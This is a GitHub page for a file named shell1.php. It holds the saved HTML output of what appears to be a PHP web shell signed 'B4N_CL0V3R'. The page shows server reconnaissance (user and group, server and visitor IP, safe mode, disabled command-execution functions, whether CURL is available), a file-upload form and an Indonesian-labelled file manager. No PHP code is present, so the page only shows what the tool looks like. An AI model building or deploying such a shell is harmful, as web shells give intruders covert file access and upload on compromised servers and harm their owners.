-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathshell1.php
151 lines (146 loc) · 4.1 KB
/
shell1.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
<!DOCTYPE HTML>
<HTML>
<HEAD>
<style>
* {
font-family: Electrolize, sans-serif;
}
body {
background-color: black;
background-size: 100%;
background-repeat:no-repeat;
margin: 0px;
font-family: "Electrolize", sans-serif; cursive;color:#fff;
font-size: 13px;
}
hr {
background-color: #ea3233; height: 1px; border: 0;
}
a {
text-decoration:none; color:#ffe28a; cursor: auto;} a:hover{
border-bottom-width: 1px;
border-bottom-style: solid;
border-bottom-color: #ffffff;
}
tbody {
display: table-row-group;
vertical-align: middle;
border-color: inherit;
}
table {
white-space: normal;
line-height: normal;
font-weight: normal;
font-style: normal;
color: -internal-quirk-inherit;
text-align: start;
font-variant: normal normal;
}
table {
display: table;
border-collapse: separate;
border-spacing: 2px;
border-color: grey;
}
tr {
display: table-row;
vertical-align: inherit;
border-color: inherit;
}
td, th {
display: table-cell;
vertical-align: inherit;
}
.content{
width:100%; text-decoration:none; color:#ffe28a;
}
a {
-webkit-transition:all .4s ease-in-out;-moz-transition:all .4s ease-in-out;-o-transition:all .4s ease-in-out;-ms-transition:all .4s ease-in-out;transition:all .4s ease-in-out
text-decoration:none;
}
.content a:link {
text-decoration: none;
}
.content a:visited {
}
.content a:hover {
background: #ffe28a; color: black;
}
.content td{
padding:0 8px; line-height:24px;
}
.content th{
background: #191919; padding:3px 8px; font-weight:normal;
}
.content tr:hover{
cursor:pointer;
background-color: #111111;
}
input[type=submit]{
background:#000000;
color:#ffe28a;
margin:0 4px;
font-size:13px;
border:1px solid #444444;
cursor:pointer;
-moz-border-radius: 5px;
-webkit-border-radius: 5px;
-khtml-border-radius: 5px;
}
input[type=submit]:hover{
border-bottom:1px solid #ffffff;
font-size:13px;
border-top:1px solid #ffffff;
}
input[type=text], option, select {
background:#000000;
border:0;
padding:2px;
border-bottom:1px solid #393939;
color:#ffe28a;
}
textarea {
margin:auto;
border:1px solid #333333;
width:100%;
height:400px;
background:#000000;
color:#ffe28a;
padding:0 2px;
font-size:12px;
}
</style>
</HEAD>
<BODY>
<br/>
System : <font color=#ffe28a></font><br>
User : <font color=#ffe28a></font> () Group : <font color=#ffe28a>fhsmo219</font> (1096)<br>
Server IP : <font color=#ffe28a>127.0.0.1</font> | Your IP : <font color=#ffe28a>14.243.111.72</font><br>
HDD : <font color=#ffe28a>0</font> / <font color=#ffe28a> B</font> ( Free : <font color=#ffe28a> B</font> )<br>
Safe Mode : <font color=#ffe28a><font>OFF</font></font><br>
Time On Server : <font color=#ffe28a>11 Jul 2020 09:07</font><br>
Disable Functions : <font color=#ffe28a><font color=#ea3233>exec,passthru,shell_exec,system,proc_open,popen,curl_multi_exec,parse_ini_file,show_source</font></font><br>
MySQL : <font color=#ea3233>OFF</font> | Perl : <font color=#ea3233>OFF</font> | Python : <font color=#ea3233>OFF</font> | WGET : <font color=#ea3233>OFF</font> | CURL : <font color=#6fcb9f>ON</font><br>
<tr><td>Current Path : <a href="?path=/">/</a><a href="?path=/home">home</a>/</td>
</tr>
<tr>
<td><div align="center"<tr><form enctype="multipart/form-data" method="POST">
Upload File : <input type="file" name="file" />
<input type="submit" value=">" />
</form>
</td></tr></div></table><br /><center></center><div><table width="700" class="content" border="0" cellpadding="3" cellspacing="1" align="center">
<tr>
<th><center>Nama</center></th>
<th><center>Ukuran</center></th>
<th><center>Hak Akses</center></th>
<th><center>Pilihan</center></th>
</tr><tr class="first"><td></td><td></td><td></td><td></td></tr></table>
</div><br />
</BODY>
</HTML><hr>
<center>
<font style="color:#fffeb3;font-size:14px;font-family:Electrolize;text-shadow: 1px 1px 2px #000000, 1px 1px 2px #000000, 1px 1px 2px #000000">
Copyright © 2020 B4N_CL0V3R .
</font>
</center>
</hr>